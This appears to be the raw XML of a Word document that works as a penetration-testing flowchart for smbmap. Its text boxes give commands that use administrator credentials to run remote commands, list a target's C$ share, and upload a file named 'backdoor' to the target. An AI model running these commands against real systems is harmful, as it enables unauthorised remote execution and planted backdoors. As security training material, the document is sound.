                              <w:t>-x = command to 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A9293" id="Rounded Rectangle 61" o:spid="_x0000_s1061" style="position:absolute;margin-left:114.45pt;margin-top:7.7pt;width:303.0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ZPcgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1r2zAQ/j7YfxD6vjpJkzYJcUpo6RiU&#10;tvSFflZkKTGTddpJiZ39+p1kxy1dYWPsi6zTvT/3nBcXTWXYXqEvweZ8eDLgTFkJRWk3OX9+uv4y&#10;5cwHYQthwKqcH5TnF8vPnxa1m6sRbMEUChkFsX5eu5xvQ3DzLPNyqyrhT8ApS0oNWIlAIm6yAkVN&#10;0SuTjQaDs6wGLByCVN7T61Wr5MsUX2slw53WXgVmck61hXRiOtfxzJYLMd+gcNtSdmWIf6iiEqWl&#10;pH2oKxEE22H5W6iqlAgedDiRUGWgdSlV6oG6GQ7edfO4FU6lXggc73qY/P8LK2/398jKIudnQ86s&#10;qGhGD7CzhSrYA6En7MYoRjoCqnZ+TvaP7h47ydM1dt1orOKX+mFNAvfQg6uawCQ9nk7H08lkwpkk&#10;3WQ2m47PY9Ds1duhD18VVCxeco6xjFhDAlbsb3xo7Y925BxLaotIt3AwKtZh7IPS1BWlHSbvxCd1&#10;aZDtBTFBSKlsmHT5k3V006UxvePoz46dfXRViWu9819k7T1SZrChd65KC/hR9uJ7mgNBplv7IwJt&#10;3xGC0KybNM7T1F18WkNxoBkjtOT3Tl6XBPCN8OFeILGd9oI2ONzRoQ3UOYfuxtkW8OdH79GeSEha&#10;zmranpz7HzuBijPzzRI9Z8PxOK5bEsaT8xEJ+Fazfquxu+oSaCzEQKouXaN9MMerRqheaNFXMSup&#10;hJWUO+cy4FG4DO1W069CqtUqmdGKORFu7KOTRyJE7jw1LwJdx7JA/LyF46aJ+TuetbZxRBZWuwC6&#10;TCR8xbUbAa1n4nL3K4n7/1ZOVq8/vOUvAAAA//8DAFBLAwQUAAYACAAAACEA41iG/N0AAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPzU7DMBCE70i8g7VI3KhNaGmSxqkoggNHCg+wjd0karyOYucH&#10;np7lBMed+TQ7U+wX14nJDqH1pOF+pUBYqrxpqdbw+fF6l4IIEclg58lq+LIB9uX1VYG58TO92+kY&#10;a8EhFHLU0MTY51KGqrEOw8r3ltg7+8Fh5HOopRlw5nDXyUSpR+mwJf7QYG+fG1tdjqPT8GIOZ/N2&#10;oXF7cKH/ntcJqinR+vZmedqBiHaJfzD81ufqUHKnkx/JBNFpSJI0Y5SNzRoEA+nDhsedWFBZBrIs&#10;5P8J5Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAcfxGT3ICAAA4BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA41iG/N0AAAAKAQAADwAAAAAA&#10;AAAAAAAAAADM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70606" w:rsidRDefault="00C70606" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>smbmap -u administrator -p password -H IP_addr -x "ipconfig"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; </w:t>
                      </w:r>
                      <w:r w:rsidR="00D628B3">
                        <w:t>-x = command to execute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0606" w:rsidRDefault="00C70606" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00C70606" w:rsidRDefault="008D602E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A9F7C9" wp14:editId="3A93C1CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1455166</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>169722</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3480179" cy="607162"/>
                <wp:effectExtent l="0" t="0" r="25400" b="2159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179" cy="6071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CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>smbmap -u administrator -p password -H IP_addr -r 'C$'</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; </w:t>
                            </w:r>
                            <w:r w:rsidR="00D628B3">
                              <w:t>-r = listing a drive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9F7C9" id="Rounded Rectangle 26" o:spid="_x0000_s1062" style="position:absolute;margin-left:114.6pt;margin-top:13.35pt;width:274.05pt;height:4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14cQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmlAIVKapATJMQ&#10;VLyIz65jt9Ecn3d2m3S/fmcnDYghbZr2xfHl3p97zheXbW3YTqGvwBY8PxpxpqyEsrLrgj8/3Xw5&#10;48wHYUthwKqC75Xnl/PPny4aN1Nj2IApFTIKYv2scQXfhOBmWeblRtXCH4FTlpQasBaBRFxnJYqG&#10;otcmG49G06wBLB2CVN7T3+tOyecpvtZKhnutvQrMFJxqC+nEdK7imc0vxGyNwm0q2Zch/qGKWlSW&#10;kg6hrkUQbIvVb6HqSiJ40OFIQp2B1pVUqQfqJh+96+ZxI5xKvRA43g0w+f8XVt7tlsiqsuDjKWdW&#10;1DSjB9jaUpXsgdATdm0UIx0B1Tg/I/tHt8Re8nSNXbca6/ilflibwN0P4Ko2MEk/jydno/z0nDNJ&#10;uunoNJ+OY9Ds1duhD18V1CxeCo6xjFhDAlbsbn3o7A925BxL6opIt7A3KtZh7IPS1BWlzZN34pO6&#10;Msh2gpggpFQ2nPT5k3V005Uxg+P4z469fXRViWuD819kHTxSZrBhcK4rC/hR9vJ73pesO/sDAl3f&#10;EYLQrto0zuNhZCso9zRjhI783smbigC+FT4sBRLbaS9og8M9HdpAU3Dob5xtAH9+9D/aEwlJy1lD&#10;21Nw/2MrUHFmvlmi53k+mcR1S8Lk5HRMAr7VrN5q7La+AhpLTm+Fk+ka7YM5XDVC/UKLvohZSSWs&#10;pNwFlwEPwlXotpqeCqkWi2RGK+ZEuLWPTh6IELnz1L4IdD3LAvHzDg6bJmbveNbZxhFZWGwD6CqR&#10;MELd4dqPgNYzcbl/SuL+v5WT1euDN/8FAAD//wMAUEsDBBQABgAIAAAAIQA/qwml3AAAAAoBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqFMX1ZDGqSiCBUsKHzCN3SRqPI5i5wFf&#10;z7CC3Yzm6M65xX7xnZjcENtABtarDISjKtiWagOfH693DyBiQrLYBXIGvlyEfXl9VWBuw0zvbjqm&#10;WnAIxRwNNCn1uZSxapzHuAq9I76dw+Ax8TrU0g44c7jvpMqyrfTYEn9osHfPjasux9EbeLGHs327&#10;0KgPPvbf873CbFLG3N4sTzsQyS3pD4ZffVaHkp1OYSQbRWdAqUfFKA9bDYIBrfUGxIlJpTYgy0L+&#10;r1D+AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFpGDXhxAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAD+rCaXcAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAy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16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>smbmap -u administrator -p password -H IP_addr -r 'C$'</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; </w:t>
                      </w:r>
                      <w:r w:rsidR="00D628B3">
                        <w:t>-r = listing a drive content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0606" w:rsidRDefault="00C70606" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="004A29C7" w:rsidRDefault="00F877C1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0206C0" wp14:editId="06C9D277">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>428879</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>81280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="497205"/>
                <wp:effectExtent l="19050" t="0" r="38100" b="36195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7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B3F5" id="Down Arrow 91" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:33.75pt;margin-top:6.4pt;width:36pt;height:39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stcgIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X50U6bYYdYqgRYcB&#10;RVssHXpWZCk2IIkapcTJfv0o2XGKtthhmA8yJZKPH3rU5dXeGrZTGFpwFZ+eTThTTkLduk3Ffz7d&#10;fvrKWYjC1cKAUxU/qMCvFh8/XHa+VOfQgKkVMgJxoex8xZsYfVkUQTbKinAGXjlSakArIm1xU9Qo&#10;OkK3pjifTD4XHWDtEaQKgU5veiVfZHytlYwPWgcVmak45Rbzinldp7VYXIpyg8I3rRzSEP+QhRWt&#10;o6Aj1I2Igm2xfQNlW4kQQMczCbYArVupcg1UzXTyqppVI7zKtVBzgh/bFP4frLzfPSJr64rPp5w5&#10;YemObqBzbIkIHaND6lDnQ0mGK/+Iwy6QmMrda7TpT4Wwfe7qYeyq2kcm6XB28YVuijNJqtmc5IuE&#10;WZycPYb4TYFlSah4TeFz9NxQsbsLsbc/2pFzyqjPIUvxYFRKw7gfSlM1FPU8e2ceqWuDbCeIAUJK&#10;5eK0VzWiVv3xxYS+IanRI6eYAROybo0ZsQeAxNG32H2ug31yVZmGo/Pkb4n1zqNHjgwujs62dYDv&#10;ARiqaojc2x+b1LcmdWkN9YHuGqEfguDlbUsNvxMhPgok1tMd0STHB1q0ga7iMEicNYC/3ztP9kRG&#10;0nLW0RRVPPzaClScme+OaDqfzmZp7PImE4EzfKlZv9S4rb0GuiZiImWXRXLGaI6iRrDPNPDLFJVU&#10;wkmKXXEZ8bi5jv1005Mh1XKZzWjUvIh3buVlAk9dTVx62j8L9APrItH1Ho4TJ8pXvOttk6eD5TaC&#10;bjMpT30d+k1jmokzPCnpHXi5z1anh2/xBwAA//8DAFBLAwQUAAYACAAAACEAKWZdgt0AAAAIAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPQU+DQBCF7yb+h82YeLMLNFZBlsaY9mLsodWLtymMQMrOIrsF&#10;/PdOT3qc917efC9fz7ZTIw2+dWwgXkSgiEtXtVwb+Hjf3j2C8gG5ws4xGfghD+vi+irHrHIT72k8&#10;hFpJCfsMDTQh9JnWvmzIol+4nli8LzdYDHIOta4GnKTcdjqJopW22LJ8aLCnl4bK0+FsDUy7GfXn&#10;Jm032+gtWZ7c6y4Zv425vZmfn0AFmsNfGC74gg6FMB3dmSuvOgOrh3tJip7Igou/TEU4GkjjGHSR&#10;6/8Dil8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9H7bLXICAABABQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAKWZdgt0AAAAIAQAADwAAAAAA&#10;AAAAAAAAAADMBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANYFAAAAAA==&#10;" adj="11669" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00C70606" w:rsidRDefault="00F877C1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D889FB" wp14:editId="56324B4F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>58293</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1228954" cy="1148486"/>
                <wp:effectExtent l="0" t="0" r="28575" b="139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1148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B3" w:rsidRDefault="00D628B3" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Uploading file to target device</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00476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889FB" id="Oval 67" o:spid="_x0000_s1063" style="position:absolute;margin-left:4.6pt;margin-top:3.95pt;width:96.75pt;height:90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ARfQIAAE0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVF9P2zAQf5+072D5faTpCpSqKapATJMQ&#10;IGDi2XXsxpLj82y3Sffpd7bTgAbaw7Q8OHe+u9/99/KybzXZC+cVmIqWJxNKhOFQK7Ot6I/nmy9z&#10;SnxgpmYajKjoQXh6ufr8adnZhZhCA7oWjiCI8YvOVrQJwS6KwvNGtMyfgBUGhRJcywKyblvUjnWI&#10;3upiOpmcFR242jrgwnu8vc5Cukr4Ugoe7qX0IhBdUYwtpNOlcxPPYrVki61jtlF8CIP9QxQtUwad&#10;jlDXLDCyc+odVKu4Aw8ynHBoC5BScZFywGzKyR/ZPDXMipQLFsfbsUz+/8Hyu/2DI6qu6Nk5JYa1&#10;2KP7PdMEWaxNZ/0CVZ7sgxs4j2RMtJeujX9MgfSpnoexnqIPhONlOZ3OL05nlHCUleVsPpufRdTi&#10;1dw6H74JaEkkKiq0VtbHnNmC7W99yNpHLTSNEeUYEhUOWkRlbR6FxDzQ6zRZpwkSV9oRzKaijHNh&#10;QplFDatFvj6d4DeENFqkABNgRJZK6xF7AIjT+R47xzroR1ORBnA0nvwtsGw8WiTPYMJo3CoD7iMA&#10;jVkNnrP+sUi5NLFKod/0qcdfx6ZuoD5g4x3kjfCW3yjswC3z4YE5XAFcFlzrcI+H1NBVFAaKkgbc&#10;r4/uoz5OJkop6XClKup/7pgTlOjvBmf2opzN4g4mZnZ6PkXGvZVs3krMrr0C7FyJD4jliYz6QR9J&#10;6aB9we1fR68oYoaj74ry4I7MVcirju8HF+t1UsO9syzcmifLI3gsdByv5/6FOTuMYcAJvoPj+r0b&#10;xawbLQ2sdwGkSnMaS53rOrQAdzbN0vC+xEfhLZ+0Xl/B1W8AAAD//wMAUEsDBBQABgAIAAAAIQDQ&#10;8rUs2wAAAAcBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI7BSsQwFEX3gv8QnuDOSSzipLXpIEJBBRfW&#10;us80zzZM81KadKb69caVs7zcw72n3K1uZEecg/Wk4HYjgCF13ljqFbQf9Y0EFqImo0dPqOAbA+yq&#10;y4tSF8af6B2PTexZGqFQaAVDjFPBeegGdDps/ISUui8/Ox1TnHtuZn1K427kmRD33GlL6WHQEz4N&#10;2B2axSn4ea5bG5e8kaJ9PbzdvdSe20+lrq/WxwdgEdf4D8OfflKHKjnt/UImsFFBniVQwTYHltpM&#10;ZFtg+4RJKYFXJT/3r34BAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEABbKgEX0CAABNBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA0PK1LN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628B3" w:rsidRDefault="00D628B3" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Uploading file to target device</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00476B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B4B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ED60B" wp14:editId="6F063896">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1527810</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>49073</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1563929" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="1778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929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7D28B7" w:rsidP="00E67F88">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>touch backdoor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ED60B" id="Rounded Rectangle 27" o:spid="_x0000_s1064" style="position:absolute;margin-left:120.3pt;margin-top:3.85pt;width:123.1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YIdAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95GmUKAVKapATJMQ&#10;Q8DEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee88VlWxu2V+grsAXPjyacKSuhrOym4N+ebj6d&#10;c+aDsKUwYFXBD8rzy+XHDxeNW6gpbMGUChkFsX7RuIJvQ3CLLPNyq2rhj8ApS0oNWItAIm6yEkVD&#10;0WuTTSeT06wBLB2CVN7T3+tOyZcpvtZKhq9aexWYKTjVFtKJ6VzHM1teiMUGhdtWsi9D/EMVtags&#10;JR1DXYsg2A6r30LVlUTwoMORhDoDrSupUg/UTT55083jVjiVeiFwvBth8v8vrLzb3yOryoJPzziz&#10;oqYZPcDOlqpkD4SesBujGOkIqMb5Bdk/unvsJU/X2HWrsY5f6oe1CdzDCK5qA5P0M5+dHs+nc84k&#10;6Y5P8/ksoZ+9eDv04bOCmsVLwTGWEWtIwIr9rQ+UluwHOxJiSV0R6RYORsU6jH1QmrqKaZN34pO6&#10;Msj2gpggpFQ2zGJTFC9ZRzddGTM6Tv/s2NtHV5W4Njr/RdbRI2UGG0bnurKA72Uvv+d9ybqzHxDo&#10;+o4QhHbdpnEenw8jW0N5oBkjdOT3Tt5UBPCt8OFeILGd9oI2OHylQxtoCg79jbMt4M/3/kd7IiFp&#10;OWtoewruf+wEKs7MF0v0nOcnJ3HdknAyO5uSgK8169cau6uvgMaS01vhZLpG+2CGq0aon2nRVzEr&#10;qYSVlLvgMuAgXIVuq+mpkGq1Sma0Yk6EW/vo5ECEyJ2n9lmg61kWiJ93MGyaWLzhWWcbR2RhtQug&#10;q0TCCHWHaz8CWs/Epf4pifv/Wk5WLw/e8hcAAAD//wMAUEsDBBQABgAIAAAAIQB/cHtw2wAAAAgB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtZW4UbtRlJSQTUURHDhSeIBt7CZR43UU&#10;Oz/w9JgTHEczmvmmPKy2F7MZfecYYbdVIAzXTnfcIHx+vN7vQfhArKl3bBC+jIdDdXtTUqHdwu9m&#10;PoVGxBL2BSG0IQyFlL5ujSW/dYPh6F3caClEOTZSj7TEctvLRKlMWuo4LrQ0mOfW1NfTZBFe9PGi&#10;36485Ufrh+8lTUjNCeLdZn16BBHMGv7C8Isf0aGKTGc3sfaiR0hSlcUoQp6DiH66zx5AnBGyNAdZ&#10;lfL/geoHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAy0w2CHQCAAA4BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAf3B7cNsAAAAIAQAADwAAAAAA&#10;AAAAAAAAAADO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7D28B7" w:rsidP="00E67F88">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>touch backdoor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16CAE" w:rsidRDefault="00D628B3" w:rsidP="00D16CA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8D5EE" wp14:editId="3AB40166">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1528598</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>174625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3650285" cy="577901"/>
                <wp:effectExtent l="0" t="0" r="2667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85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Pr="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>smbmap -u administrator -p password -H IP_addr --upload "/root/backdoor" "C$\backdoor"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28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8D5EE" id="Rounded Rectangle 28" o:spid="_x0000_s1065" style="position:absolute;margin-left:120.35pt;margin-top:13.75pt;width:287.4pt;height:4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22cQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem7WdOBfjdTAOKYWQ&#10;hFzIs6yV7KVajTqSvet+fUfaS0IaaCl90Wp27mfOaH7ZVIbtFfoSbM7HRyPOlJVQlHaT8+en6y/n&#10;nPkgbCEMWJXzg/L8cvH507x2MzWBLZhCIaMg1s9ql/NtCG6WZV5uVSX8EThlSakBKxFIxE1WoKgp&#10;emWyyWh0mtWAhUOQynv6e9Uq+SLF11rJcKe1V4GZnFNtIZ2YznU8s8VczDYo3LaUXRniH6qoRGkp&#10;6RDqSgTBdlj+FqoqJYIHHY4kVBloXUqVeqBuxqN33TxuhVOpFwLHuwEm///Cytv9PbKyyPmEJmVF&#10;RTN6gJ0tVMEeCD1hN0Yx0hFQtfMzsn9099hJnq6x60ZjFb/UD2sSuIcBXNUEJunn8el0NDmfciZJ&#10;Nz07uxiNY9Ds1duhD18VVCxeco6xjFhDAlbsb3xo7Xs7co4ltUWkWzgYFesw9kFp6orSjpN34pNa&#10;GWR7QUwQUiobpl3+ZB3ddGnM4Dj5s2NnH11V4trg/BdZB4+UGWwYnKvSAn6UvfjeQ6Zb+x6Btu8I&#10;QWjWTRrn8UU/sjUUB5oxQkt+7+R1SQDfCB/uBRLbaS9og8MdHdpAnXPobpxtAX9+9D/aEwlJy1lN&#10;25Nz/2MnUHFmvlmi58X45CSuWxJOpmcTEvCtZv1WY3fVCmgsY3ornEzXaB9Mf9UI1Qst+jJmJZWw&#10;knLnXAbshVVot5qeCqmWy2RGK+ZEuLGPTvZEiNx5al4Euo5lgfh5C/2midk7nrW2cUQWlrsAukwk&#10;jFC3uHYjoPVMXO6ekrj/b+Vk9frgLX4BAAD//wMAUEsDBBQABgAIAAAAIQDMiOON3AAAAAoBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SP0Hayqxo06ihkQhTkURLFjS8gHT2E2ixuModh7w&#10;9Qwr2N3RHN05Ux5W24vZjL5zpCDeRSAM1U531Cj4PL895CB8QNLYOzIKvoyHQ7W5K7HQbqEPM59C&#10;I7iEfIEK2hCGQkpft8ai37nBEO+ubrQYeBwbqUdcuNz2MomiR2mxI77Q4mBeWlPfTpNV8KqPV/1+&#10;oyk7Wj98L/sEozlR6n67Pj+BCGYNfzD86rM6VOx0cRNpL3oFyT7KGOWQpSAYyOOUw4XJOE9BVqX8&#10;/0L1AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADxYvbZxAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAMyI443cAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAy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Pr="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>smbmap -u administrator -p password -H IP_addr --upload "/root/backdoor" "C$\backdoor"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28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D28B7" w:rsidRDefault="007D28B7" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="008D602E" w:rsidP="007D28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0206C0" wp14:editId="06C9D277">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>555371</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>278130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="497205"/>
                <wp:effectExtent l="19050" t="0" r="38100" b="36195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7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C293" id="Down Arrow 92" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:43.75pt;margin-top:21.9pt;width:36pt;height:3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PScwIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X50E6bYYcYqgRYcB&#10;RVssHXpWZKk2IIkapcTJfv0o2XGLtthhmA8yJZKPH3rU8uJgDdsrDC24ik/PJpwpJ6Fu3VPFfz5c&#10;f/rKWYjC1cKAUxU/qsAvVh8/LDtfqhk0YGqFjEBcKDtf8SZGXxZFkI2yIpyBV46UGtCKSFt8KmoU&#10;HaFbU8wmk89FB1h7BKlCoNOrXslXGV9rJeOd1kFFZipOucW8Yl63aS1WS1E+ofBNK4c0xD9kYUXr&#10;KOgIdSWiYDts30DZViIE0PFMgi1A61aqXANVM528qmbTCK9yLdSc4Mc2hf8HK2/398jauuKLGWdO&#10;WLqjK+gcWyNCx+iQOtT5UJLhxt/jsAskpnIPGm36UyHskLt6HLuqDpFJOpyff6Gb4kySar4g+Txh&#10;Fs/OHkP8psCyJFS8pvA5em6o2N+E2Nuf7Mg5ZdTnkKV4NCqlYdwPpakaijrL3plH6tIg2wtigJBS&#10;uTjtVY2oVX98PqFvSGr0yClmwISsW2NG7AEgcfQtdp/rYJ9cVabh6Dz5W2K98+iRI4OLo7NtHeB7&#10;AIaqGiL39qcm9a1JXdpCfaS7RuiHIHh53VLDb0SI9wKJ9XRHNMnxjhZtoKs4DBJnDeDv986TPZGR&#10;tJx1NEUVD792AhVn5rsjmi6m83kau7zJROAMX2q2LzVuZy+BrmlKb4aXWSRnjOYkagT7SAO/TlFJ&#10;JZyk2BWXEU+by9hPNz0ZUq3X2YxGzYt44zZeJvDU1cSlh8OjQD+wLhJdb+E0caJ8xbveNnk6WO8i&#10;6DaT8rmvQ79pTDNxhiclvQMv99nq+eFb/QEAAP//AwBQSwMEFAAGAAgAAAAhANKgIhrfAAAACQEA&#10;AA8AAABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SGzUqUuhDXEqhNoF0YHSpZsbH0nU+Bxi&#10;Nwn/nutUtrt7T+++l61G14geu1B70jCdJCCQCm9rKjXsvzYPCxAhGrKm8YQafjHAKr+9yUxq/UCf&#10;2O9iKTiEQmo0VDG2qZShqNCZMPEtEmvfvnMm8tqV0nZm4HDXSJUkT9KZmvhDZVp8q7A47c5Ow7Ad&#10;jTysl/V6k3yo2cm/b1X/o/X93fj6AiLiGK9muOAzOuTMdPRnskE0GhbPc3ZqeJxxg4s+X/LhyINS&#10;U5B5Jv83yP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA53AT0nMCAABABQAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA0qAiGt8AAAAJAQAADwAA&#10;AAAAAAAAAAAAAADNBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANkFAAAAAA==&#10;" adj="11669" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="008D602E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44C1C4" wp14:editId="6ACA7117">
